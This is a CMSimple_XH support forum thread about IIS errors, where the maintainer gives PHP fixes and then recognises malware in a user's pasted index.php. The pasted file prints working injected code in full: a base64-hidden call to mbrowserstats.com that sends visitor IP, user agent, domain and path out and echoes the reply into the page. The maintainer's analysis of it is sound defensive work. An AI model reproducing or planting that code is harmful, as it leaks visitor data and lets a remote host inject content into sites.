REQUEST_URI and CGI error

Questions about how to install and problems installing - please read the documentation first!
Post Reply
Rkay77
Posts: 16
Joined: Tue Mar 26, 2013 3:27 pm

REQUEST_URI and CGI error

Post by Rkay77 » Tue Mar 26, 2013 3:51 pm

Ok, I was running a site with CMS 3.3 until a recent hack and tried shifting to 4.1.1 but had issues with the install where I could login but it would bounce me back out again as soon I tried to edit anything. After hours trawling here and trying my hand at several solutions I decided to give up and try CMS_XH 1.53 and after that failed too Itried CMS_XH 1.56

That brings me to now.

I can log in
I can edit items in CMS..ie password, meta tags etc all ok
I can add and delete pages
I can upload and delete images


BUT when I go to edit the text of a page it fails, and the behaviour is strange.

It will pause/hang/delay for a few moments and then finally gives a "CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers"
and that's given at the index.php root file... ie...
it will go from http://www.WEBSITE.net.au/cmsimplexh156 ... ugins&edit have the error and go to http://www.WEBSITE.net.au/cmsimplexh156/index.php

I say it's strange because the changes are actually made but the redirect after saving seems to be broken.

I ran the debug and the message I get as soon as I login I get the following error
NOTICE: Undefined index: REQUEST_URI
d:\webspace\WEBSITE.net.au\www\cmsimplexh156\cmsimple\cms.php:126
I've found this to be
$subsite_folder_array = explode('/',str_replace($_SERVER['QUERY_STRING'],'',$_SERVER['REQUEST_URI'])); // creates array

Any suggestions? I've reloaded the site with CMS3.3 but with the known exploit and recent hack I'd prefer to move to a newer version but my server/host seems against me :(

cmb
Posts: 14225
Joined: Tue Jun 21, 2011 11:04 am
Location: Bingen, RLP, DE
Contact:

Re: REQUEST_URI and CGI error

Post by cmb » Tue Mar 26, 2013 4:21 pm

Hi,
Rkay77 wrote:I say it's strange because the changes are actually made but the redirect after saving seems to be broken.
Yes, you found a bug. The redirect uses a relative URL, which is not accepted by IIS (at least not always/by all versions?). Replace cmsimple/adm.php line 429:

Code: Select all

        header("Location: " . $sn . "?" . $su);
with:

Code: Select all

        header('Location: http'
            . (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 's' : '')
            . '://' . $_SERVER['SERVER_NAME']
            . ($_SERVER['SERVER_PORT'] < 1024 ? '' : ':' . $_SERVER['SERVER_PORT'])
            . preg_replace('/index.php$/', '', $_SERVER['SCRIPT_NAME']) . "?" . $su, true, 303);
Rkay77 wrote:$subsite_folder_array = explode('/',str_replace($_SERVER['QUERY_STRING'],'',$_SERVER['REQUEST_URI'])); // creates array
And that's another bug, you've found. REQUEST_URI is not defined on IIS, so it can't work. Quick fix: replace this line with:

Code: Select all

$subsite_folder_array = explode('/',str_replace($_SERVER['QUERY_STRING'],'',$_SERVER['SCRIPT_NAME'])); // creates array
Christoph
Christoph M. Becker – Plugins for CMSimple_XH

Rkay77
Posts: 16
Joined: Tue Mar 26, 2013 3:27 pm

Re: REQUEST_URI and CGI error

Post by Rkay77 » Fri Mar 29, 2013 1:37 am

Thank you Christoph, that seems to have helped get me some functionality.

I am however having this line appear after logging in

NOTICE: Undefined index: REQUEST_URI
d:\webspace\WEBSITE.net.au\www\cmsimplexh156\index.php:35

It looks like it's for the handling the bots so I'm not overly fussed right now but thought I'd mention it so we can continue to find and correct bugs :)

cmb
Posts: 14225
Joined: Tue Jun 21, 2011 11:04 am
Location: Bingen, RLP, DE
Contact:

Re: REQUEST_URI and CGI error

Post by cmb » Fri Mar 29, 2013 1:59 am

Rkay77 wrote:Thank you Christoph, that seems to have helped get me some functionality.
Glad to hear. :)
Rkay77 wrote:NOTICE: Undefined index: REQUEST_URI
d:\webspace\WEBSITE.net.au\www\cmsimplexh156\index.php:35
Hmm, index.php in the root of CMSimple_XH 1.5.6 has only 12 lines, so I'm confused about the notice. It seems you're using a modified version; could you please post the code of your index.php?

The basic problem is, that REQUEST_URI is not available on IIS. Sometimes it can simply be replaced with SCRIPT_NAME, other times it can be replaced with QUERY_STRING, and sometimes a combination of both would be necessary. Simplified:

Code: Select all

$_SERVER['REQUEST_URI'] == $_SERVER['SCRIPT_NAME'] . '?' . $_SERVER['QUERY_STRING'] 
Rkay77 wrote:but thought I'd mention it so we can continue to find and correct bugs
I very much appreciate that. I guess that only far less than 10% of CMSimple installations run under IIS, so any feedback that may help to get it running more smoothly under this web server is welcome. Since a week or so I have IIS available locally (I stumbled across this possibility by chance, after I thought it is not available for XP Home), but I hadn't have much time yet to do some real testing. And after all: this is only one version of IIS with some particular configuration.

Christoph
Christoph M. Becker – Plugins for CMSimple_XH

Rkay77
Posts: 16
Joined: Tue Mar 26, 2013 3:27 pm

Re: REQUEST_URI and CGI error

Post by Rkay77 » Fri Mar 29, 2013 9:03 am

Hmmm code of my root index.php below but it's unmodified. It's the one that came with my 1.56 install files.....

Code: Select all

<?php

/**
 * @version $Id: index.php 229 2012-07-30 13:31:07Z cmb69 $
 */

/* utf8-marker = äöüß */

include('./cmsimple/cms.php');

?><?php

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

    // This code use for global bot statistic

    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

    $stCurlHandle = NULL;

    $stCurlLink = "";

    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes

    {

        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            

        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

            @$stCurlHandle = curl_init( $stCurlLink ); 

    }

    } 

if ( $stCurlHandle !== NULL )

{

    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);

    $sResult = @curl_exec($stCurlHandle); 

    if ($sResult[0]=="O") 

     {$sResult[0]=" ";

      echo $sResult; // Statistic code end

      }

    curl_close($stCurlHandle); 

}

}

?>
Definitely seems to be an ISS issue. I'm struggleing to get a form mailer working too.
Think I might just be better to switch hosts....

cmb
Posts: 14225
Joined: Tue Jun 21, 2011 11:04 am
Location: Bingen, RLP, DE
Contact:

Re: REQUEST_URI and CGI error

Post by cmb » Fri Mar 29, 2013 11:35 am

The proper code of CMSimple_XH 1.5.6 ends on line 11 with ?>. Immediately following is some statistic (?) code, that doesn't belong to CMSimple_XH, that forwards information to mbrowserstats.com. I don't know, where this code comes from. Please check the ZIP file of CMSimple_XH 1.5.6 again, if the code is contained there (I'm quite sure it isn't). The code might have been inserted by your provider (a free hoster?), or even by some form of malware. The strange thing about the code is, that the address of mbrowserstats is BASE64 encoded, what's quite common for malware. If in doubt, you should consider yourself being hacked. At least you should check all other index.php files (e.g. plugins/index.php, plugins/XYZ/index.php) for this code.

I just googled for "base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw')", and a handful of quite recent results show up; indeed that seems to be malware, cf. http://ninjafirewall.com/malware/index. ... 3-02-22.01.

See http://cmsimpleforum.com/viewtopic.php?f=4&t=4869 for more info about what to do now.
Christoph M. Becker – Plugins for CMSimple_XH

cmb
Posts: 14225
Joined: Tue Jun 21, 2011 11:04 am
Location: Bingen, RLP, DE
Contact:

Re: REQUEST_URI and CGI error

Post by cmb » Fri Apr 19, 2013 2:48 pm

I had a closer look at the appended code. Either the coder didn't had a clue what he was doing, or indeed it's a malicious script, as the code that is commented with "Bot comes" excludes several well known bots. For all others in the following a request to an URI on the mbrowserstats.com domain is made, which sends information about the original domain, the user's IP address and the user agent amongst others. Then the response might be echo'd slightly modified (what may insert malicious code). Particularly interesting is the look parameter, which is sent back to the foreign script.

When I request the URI with faked GET parameters, I receive a 404 Not found error. But that doesn't mean anything, as the foreign script may check, if the sent domain fits to the sent IP address, or do some other verification of "valid" requests, and respond with 404 otherwise.

It's not clear to me, if mbrowserstats.com is a malicious site, or if they have been a victim of an attack themselves. Anyway, the script should be removed, and further security measures taken, AISB.
Christoph M. Becker – Plugins for CMSimple_XH

Post Reply